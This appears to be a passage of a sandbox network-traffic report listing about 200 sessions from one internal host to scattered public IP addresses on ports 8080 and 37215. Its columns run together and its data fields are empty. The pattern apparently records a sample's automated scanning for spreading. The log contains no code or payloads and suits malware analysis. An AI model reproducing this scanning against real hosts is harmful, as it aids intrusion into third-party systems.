                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9636192.168.2.2339452212.228.72.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9637192.168.2.234751482.222.179.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9638192.168.2.233415623.147.84.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9639192.168.2.2337478165.96.216.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9640192.168.2.234235684.207.25.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9641192.168.2.2344840210.184.1.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9642192.168.2.2344414143.111.171.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9643192.168.2.2339266119.192.188.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9644192.168.2.233276869.63.63.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9645192.168.2.2357360155.131.48.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9646192.168.2.235384869.64.72.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9647192.168.2.2355294121.101.95.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9648192.168.2.2355306117.206.166.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9649192.168.2.235351098.144.173.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9650192.168.2.233418483.107.177.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9651192.168.2.2345240198.229.43.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9652192.168.2.233407867.249.221.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9653192.168.2.233860264.16.127.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9654192.168.2.2333882178.36.82.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9655192.168.2.235169693.167.36.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9656192.168.2.2346024163.158.207.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9657192.168.2.2333076176.56.33.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9658192.168.2.235336881.68.54.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9659192.168.2.233292666.206.237.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9660192.168.2.236043037.216.79.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9661192.168.2.2350374217.132.151.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9662192.168.2.2349440169.84.0.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9663192.168.2.2340268119.74.91.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9664192.168.2.234293669.197.22.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9665192.168.2.235681676.87.187.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9666192.168.2.2359084110.182.134.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9667192.168.2.2348278107.205.189.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9668192.168.2.2354570123.251.192.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9669192.168.2.2341976192.202.232.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9670192.168.2.2353354133.142.50.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9671192.168.2.2351562156.206.56.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9672192.168.2.2353026153.255.143.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9673192.168.2.233880480.111.181.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9674192.168.2.2350442190.78.217.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9675192.168.2.2349728114.218.41.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9676192.168.2.233906436.189.101.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9677192.168.2.2348660111.151.162.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9678192.168.2.2337548199.153.15.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9679192.168.2.2350230200.33.244.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9680192.168.2.234573452.124.172.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9681192.168.2.2348288194.95.178.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9682192.168.2.235487058.192.35.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9683192.168.2.2342850143.144.184.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9684192.168.2.2354324222.27.144.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9685192.168.2.234213080.131.203.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9686192.168.2.233926217.196.124.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9687192.168.2.2353882119.72.150.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9688192.168.2.2332912115.251.225.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9689192.168.2.2342320176.195.58.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9690192.168.2.2334742140.57.71.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9691192.168.2.234915693.198.119.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9692192.168.2.2344278203.92.221.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9693192.168.2.234979674.55.161.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9694192.168.2.234687695.234.121.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9695192.168.2.2360440190.188.233.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9696192.168.2.2345944157.28.112.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9697192.168.2.235069487.43.58.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9698192.168.2.2343592198.240.36.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9699192.168.2.2357060147.184.178.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9700192.168.2.234602482.170.227.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9701192.168.2.2358652168.215.39.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9702192.168.2.2334334151.75.118.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9703192.168.2.2359310113.134.60.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9704192.168.2.2347120141.138.41.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9705192.168.2.23448228.117.125.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9706192.168.2.23559888.74.157.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9707192.168.2.2357794165.198.20.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9708192.168.2.235411694.255.25.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9709192.168.2.2339764160.208.133.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9710192.168.2.2335592200.249.161.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9711192.168.2.2347494102.48.41.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9712192.168.2.2357648220.90.92.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9713192.168.2.234763080.224.150.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9714192.168.2.2343530185.141.23.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9715192.168.2.2352064192.85.60.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9716192.168.2.234842452.26.60.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9717192.168.2.2339278156.157.83.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9718192.168.2.234589479.227.182.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9719192.168.2.233810096.139.212.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9720192.168.2.233482483.200.64.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9721192.168.2.234161271.105.205.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9722192.168.2.235706486.247.27.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9723192.168.2.2355068157.146.201.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9724192.168.2.2340448157.170.87.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9725192.168.2.2350106197.124.9.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9726192.168.2.233679451.165.126.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9727192.168.2.2357320157.208.87.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9728192.168.2.2357794157.255.76.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9729192.168.2.2353416197.154.157.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9730192.168.2.2343990157.87.138.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9731192.168.2.235367641.215.153.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9732192.168.2.2346808197.236.226.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9733192.168.2.2332808157.24.208.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9734192.168.2.2335790146.171.27.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9735192.168.2.234700841.131.59.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9736192.168.2.2347372154.252.91.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9737192.168.2.23329864.155.171.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9738192.168.2.2345692157.76.133.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9739192.168.2.2336560194.138.67.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9740192.168.2.233456241.24.77.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9741192.168.2.2334698157.67.255.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9742192.168.2.233688241.111.33.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9743192.168.2.2359270124.223.114.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9744192.168.2.2336958157.4.176.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9745192.168.2.235661241.30.186.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9746192.168.2.235073441.184.172.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9747192.168.2.2351392157.39.177.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9748192.168.2.2346866157.5.161.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9749192.168.2.2333930199.195.246.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9750192.168.2.2341636157.41.215.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9751192.168.2.2348006197.15.79.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9752192.168.2.2345280197.221.15.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9753192.168.2.2344690157.22.158.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9754192.168.2.2339344157.250.0.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9755192.168.2.2340536197.20.25.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9756192.168.2.2353150197.206.142.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9757192.168.2.2353402197.183.34.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9758192.168.2.2349690197.156.11.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9759192.168.2.235490041.168.223.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9760192.168.2.2359442217.154.116.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9761192.168.2.2347868197.132.139.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9762192.168.2.2354580157.206.85.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9763192.168.2.2355402157.155.101.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9764192.168.2.2351648197.75.217.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9765192.168.2.235166841.18.140.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9766192.168.2.2334246101.5.221.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9767192.168.2.2344470197.48.249.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9768192.168.2.233367064.78.129.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9769192.168.2.2347978157.86.149.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9770192.168.2.233864682.184.77.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9771192.168.2.2339760197.108.89.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9772192.168.2.2335532157.92.231.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9773192.168.2.233812241.147.81.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9774192.168.2.2359886157.137.167.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9775192.168.2.234034068.190.118.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9776192.168.2.2339938157.147.184.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9777192.168.2.2343454157.117.7.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9778192.168.2.2359384206.157.147.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9779192.168.2.234573043.166.200.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9780192.168.2.234919641.147.224.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9781192.168.2.235867841.142.215.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9782192.168.2.235418841.207.100.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9783192.168.2.2347356157.204.135.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9784192.168.2.2351148157.153.57.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9785192.168.2.233962251.120.199.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9786192.168.2.234238294.119.81.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9787192.168.2.2334910197.67.0.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9788192.168.2.234924241.155.63.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9789192.168.2.235354241.1.41.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9790192.168.2.235382041.250.193.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9791192.168.2.2347198157.23.115.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9792192.168.2.2349186157.219.144.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9793192.168.2.2336950157.129.78.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9794192.168.2.235973041.195.174.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9795192.168.2.2345490197.60.19.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9796192.168.2.235707241.109.226.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9797192.168.2.2339630157.75.63.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9798192.168.2.235466641.56.247.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9799192.168.2.2353562197.24.166.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9800192.168.2.233497041.199.149.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9801192.168.2.234026680.223.212.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9802192.168.2.2337400189.181.217.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9803192.168.2.2360912197.150.209.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9804192.168.2.233822241.97.90.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9805192.168.2.235234841.42.147.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9806192.168.2.234158241.137.61.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9807192.168.2.235916627.255.108.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9808192.168.2.2333032157.65.157.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9809192.168.2.2336190157.162.16.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9810192.168.2.2345342157.90.205.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9811192.168.2.2349608207.246.69.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9812192.168.2.2338654157.162.218.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9813192.168.2.233558041.154.161.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9814192.168.2.2353164157.169.194.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9815192.168.2.2356956157.239.252.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9816192.168.2.2335570197.19.132.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9817192.168.2.2351424197.243.59.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9818192.168.2.2349386157.213.10.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9819192.168.2.2337220117.156.188.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9820192.168.2.2354900157.14.231.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9821192.168.2.2341998157.69.75.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9822192.168.2.2349070197.101.113.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9823192.168.2.23423285.130.151.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9824192.168.2.2341568113.205.69.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9825192.168.2.234665641.122.135.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9826192.168.2.2356348157.255.168.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9827192.168.2.233573441.123.157.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9828192.168.2.2347702139.96.61.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9829192.168.2.2352204200.205.71.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9830192.168.2.2359106157.75.120.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9831192.168.2.2340804157.48.201.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9832192.168.2.2345608197.221.226.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9833192.168.2.2355872157.117.191.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9834192.168.2.235687841.209.224.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9835192.168.2.235640041.235.199.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9836192.168.2.2350976197.190.72.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9837192.168.2.2345100157.149.146.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9838192.168.2.2351330157.96.238.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9839192.168.2.234222619.235.120.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9840192.168.2.2342110197.250.73.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9841192.168.2.233358841.112.28.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9842192.168.2.234601441.72.20.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9843192.168.2.2352982197.1.147.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9844192.168.2.2333922157.35.160.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9845192.168.2.2338902157.163.219.137215
